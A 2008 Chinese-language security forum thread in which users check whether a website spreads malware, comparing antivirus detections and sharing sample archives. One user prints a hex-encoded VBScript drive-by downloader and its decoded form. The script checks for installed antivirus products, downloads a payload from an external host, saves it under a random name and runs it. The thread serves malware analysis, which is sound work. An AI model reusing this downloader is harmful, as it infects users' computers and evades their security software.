月度關注熱點

中了Win32.Zafi.B
一開機就出現木馬跟蠕蟲程式
一個奇怪現象
一開機便一直出現奇怪的程式
Backdoor.Win32.Agent.ani
中一個怪毒卡巴斯基無法更新
中毒
卡巴無法刪除packed.win32.krap.d
AntiVir PersonalEdition Premium 木馬程式
Win32/Kryptik.CY

最新更新主題

遠端遙控軟體Teamviewer,讓別人直接遠程修你的電腦
一開機就出現木馬跟蠕蟲程式
很離譜的Boilsoft Video Joiner
是否有病毒是無法從sreng報表查出的?
一開機便一直出現奇怪的程式
Spyware Doctor VS. BD Free 10
中了msn毒,有AVZ報告~
AntiVir PersonalEdition Premium 木馬程式
一個奇怪現象
中了Win32.Zafi.B

這網站有病毒嗎

發表時間: 2008-3-04 17:20    作者: 我最好你最了    來源: AVPClub Security Home

字體: | 打印

http://www.xbdb.info/

一進去我防毒軟體 F-Secure Client security7.10 209 就顯示有毒 但是別人卡巴跟AVAST都找不到

我上傳一下我抓到的病毒圖片壓縮檔

1.rar
(2008-03-04 17:20:59, Size: 115 kB, Downloads: 13)


我也來說兩句 查看全部評論 相關評論

  • krichard2007 (2008-3-04 20:59:11)

    有病毒....
    進去後 EQSecure 反應...
    以下是報告...
    2008-03-04 20:52:39    執行應用程序      操作:阻止
    程序路徑:D:\Program Files\Internet Explorer\IEXPLORE.EXE
    檔案路徑:D:\Documents and Settings\Reynaldo Chi Dee Ang\Local Settings\Temp\X7349.com
    觸發規則:所有程序規則->*


    2008-03-04 20:52:49    執行應用程序      操作:阻止
    程序路徑:D:\Program Files\Internet Explorer\IEXPLORE.EXE
    檔案路徑:D:\Documents and Settings\Reynaldo Chi Dee Ang\Local Settings\Temp\X7349.com
    觸發規則:所有程序規則->*

    自動下載一個叫....
    X7349.com
    的東西....
    KIS 7.0 Miss....

    樣本在下面...
    大家測測看吧....

    X7349.rar
    (2008-03-04 20:59:11, Size: 143 kB, Downloads: 26)

  • krichard2007 (2008-3-04 21:03:13)

    我還不知道...
    X7349.com
    點下去會發生什麼事喔.....
    對自己電腦有很大把握的人才可以試喔.....

  • juijui (2008-3-04 21:07:49)

    開IE進入後,紅傘沒警報!

  • juijui (2008-3-04 21:16:30)

    點下載紅傘報 Virus or unwanted program 'ADSPY/Drop.Boran.I [ADSPY/Drop.Boran.I]'

    那個檔是進入後產生的嗎?

    我開IE進去紅傘完全沒反應,EQ也是...

  • krichard2007 (2008-3-04 21:25:22)

    是的....
    幾秒後......
    我才敢緊按阻止....
    並且它會跳出一些廣告視窗...

  • 我最好你最了 (2008-3-04 22:02:29)

    感謝大家幫忙  謝謝

  • masterchief (2008-3-05 22:10:23)

    在下用小紅傘發現hxxp://ec.3527.com/popn_3527_2.js是惡意檔案,popn_3527_2.js裡面的iframe連至hxxp://a1.65862.com/count.html;count.html裡面的script連至hxxp://a1.65862.com/count.gif(加密)

    count.gif加密代碼(ASCII):

    QUOTE:

    4F6E206572726F7220726573756D65204E6578740D0A58313D22687474703A2F2F61642E36353836322E636F6D2F7265616C2E676966220D0A5365742058323D646F63756D656E742E637265617465456C656D656E7428226F626A22262265637422290D0A58322E7365744174747269627574652022636C6173736964222C22636C7369643A42222622443922262236433535362D363541332D313144302D393833412D303043303446433239453336220D0A536574205831373D58322E6372656174656F626A6563742822575363726970742E5368656C6C222C2222290D0A5831383D5831372E526567526561642822484B4C4D5C534F4654574152455C6164785C436F6E6669675C54696D653122290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C7265616C5C436F6E6669675C54696D653122290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C726973696E675C5261765C22290D0A5831383D583138265831372E526567526561642822484B43555C534F4654574152455C526973696E675C4B614B61546F6F6C4261725C6E616D6522290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C333630736166655C436F6F705C507265506172746E657222290D0A5831383D583138265831372E526567526561642822484B43555C534F4654574152455C4B696E67736F66745C416E746956697275735C496E7374616C6C54696D6522290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C4B6173706572736B794C61625C415650365C656E7669726F6E6D656E745C50726F647563744E616D6522290D0A4966205831383D2222205468656E0D0A58333D224D2226226963722226226F736F66742E582226224D4C48222622545450220D0A5365742058343D58322E4372656174654F626A6563742858332C2222290D0A58353D2241646F220D0A58363D2264622E220D0A58373D22537472220D0A58383D2265616D220D0A58393D58352658362658372658380D0A5831303D58390D0A736574205831313D58322E6372656174656F626A656374285831302C2222290D0A5831312E747970653D310D0A5831323D22474554220D0A58342E4F70656E205831322C58312C46616C73650D0A58342E53656E640D0A5831333D225822264353747228496E742828393939392D313030302B31292A526E642B31303030292926222E636F6D220D0A736574205831343D58322E6372656174656F626A6563742822532226226372692226227074696E672E46222622696C6553792226227374656D4F626A656374222C2222290D0A736574205831353D5831342E4765745370656369616C466F6C6465722832290D0A5831333D5831342E4275696C6450617468285831352C583133290D0A5831312E6F70656E0D0A5831312E77726974652058342E726573706F6E7365426F64790D0A5831312E73617665746F66696C65205831332C320D0A5831312E636C6F73650D0A53657420583136203D2058322E6372656174656F626A6563742822575363726970742E5368656C6C222C2222290D0A5831362E72756E28583133290D0A456E64204966
    解密後,病毒之藏身之處為hxxp://ad.65862.com/real.gif

    Avira AntiVir:
    popn_3527_2.js contains detection pattern of the Java script virus JS/Dldr.Boran.1
    real.gif contains detection pattern of the Ad- or Spyware ADSPY/Drop.Boran.I
    count.gif contains detection pattern of the VBS script virus VBS/Dldr.Boran.I

  • a750828 (2008-3-05 23:07:21)

    McAfee miss

  • Wan (2008-3-08 20:36:08)

    趨勢報已知惡意程式
    from d:\病毒\X7349.rar,(X7349.com)
    TROJ_SMALL.FQE

  • sun88990 (2008-3-24 15:14:39)

    McAfee miss

  • said411f (2008-3-24 19:09:44)

    555.......

    偶LinkScanner~avast 4.8~都沒有反應

  • shen36930 (2008-3-25 00:08:00)

    上傳給只會分析的ca看看

  • home81 (2008-3-27 19:26:24)

    全部d檔案
    用卡巴斯基掃過
    無病毒=口=

  • masterchief (2008-4-05 19:20:19)

    現在瀏覽那個網站還是會下載惡意程式
    而且X7349.com其實是利用惡意語法把下載後的real.gif(連結為hxxp://ad.65862.com/)隨機更名
    VT掃描的結果→http://www.virustotal.com/zh-tw/ ... 016eec1d8429679dbef

    count.gif(hxxp://a1.65862.com/)解密後的內容如下
    On error resume Next
    X1="hxxp://ad.65862.com/real.gif" →網馬的連結位址
    Set X2=document.createElement("obj"&"ect")
    X2.setAttribute "classid","clsid:B"&"D9"&"6C556-65A3-11D0-983A-00C04FC29E36"
    Set X17=X2.createobject("WScript.Shell","")
    X18=X17.RegRead("HKLM\SOFTWARE\adx\Config\Time1")
    X18=X18&X17.RegRead("HKLM\SOFTWARE\real\Config\Time1")
    X18=X18&X17.RegRead("HKLM\SOFTWARE\rising\Rav\")
    X18=X18&X17.RegRead("HKCU\SOFTWARE\Rising\KaKaToolBar\name")
    X18=X18&X17.RegRead("HKLM\SOFTWARE\360safe\Coop\PrePartner")
    X18=X18&X17.RegRead("HKCU\SOFTWARE\Kingsoft\AntiVirus\InstallTime")
    X18=X18&X17.RegRead("HKLM\SOFTWARE\KasperskyLab\AVP6\environment\ProductName")
    If X18="" Then
    X3="M"&"icr"&"osoft.X"&"MLH"&"TTP"
    Set X4=X2.CreateObject(X3,"")
    X5="Ado"
    X6="db."
    X7="Str"
    X8="eam"
    X9=X5&X6&X7&X8
    X10=X9
    set X11=X2.createobject(X10,"")
    X11.type=1
    X12="GET"
    X4.Open X12,X1,False
    X4.Send
    X13="X"&CStr(Int((9999-1000+1)*Rnd+1000))&".com" →隨機命名病毒的語法
    set X14=X2.createobject("S"&"cri"&"pting.F"&"ileSy"&"stemObject","")
    set X15=X14.GetSpecialFolder(2)
    X13=X14.BuildPath(X15,X13)
    X11.open
    X11.write X4.responseBody
    X11.savetofile X13,2
    X11.close
    Set X16 = X2.createobject("WScript.Shell","")
    X16.run(X13)
    End If

    從上述的內容來看,其惡意程式是衝著卡巴、金山毒霸、360安全衛士、瑞星等軟體來的。

    [ 本帖最後由 masterchief 於 2008-4-5 19:27 編輯 ]

  • sun88990 (2008-4-18 23:04:30)

    McAfee found nothing

  • Mr.Z (2008-4-19 17:52:58)

    怎麼直接放個網址出來

  • flyJK (2008-4-24 02:56:39)

    火狐說他是危險網站
    我就沒進去了

  • Topus (2008-4-24 05:02:43)

    Access to the data has been denied!
    Warning: A virus or unwanted program has been found in the HTTP Data.

    Requested URL:  http://www.avpclub.ddns.info/discuz/attachment.php?aid=4735
    Information:  Contains detection pattern of the Ad- or Spyware ADSPY/Drop.Boran.I  


    --------------------------------------------------------------------------------
    Generated by AntiVir WebGuard 8.0.13.0, AVE 8.1.0.32, VDF 7.0.3.204

  • Topus (2008-4-24 05:05:37)

    補充:

  • 郭政勳 (2008-5-02 14:12:25)

    Avira C版 found nothing 又是沒有AD
查看全部評論我也來說兩句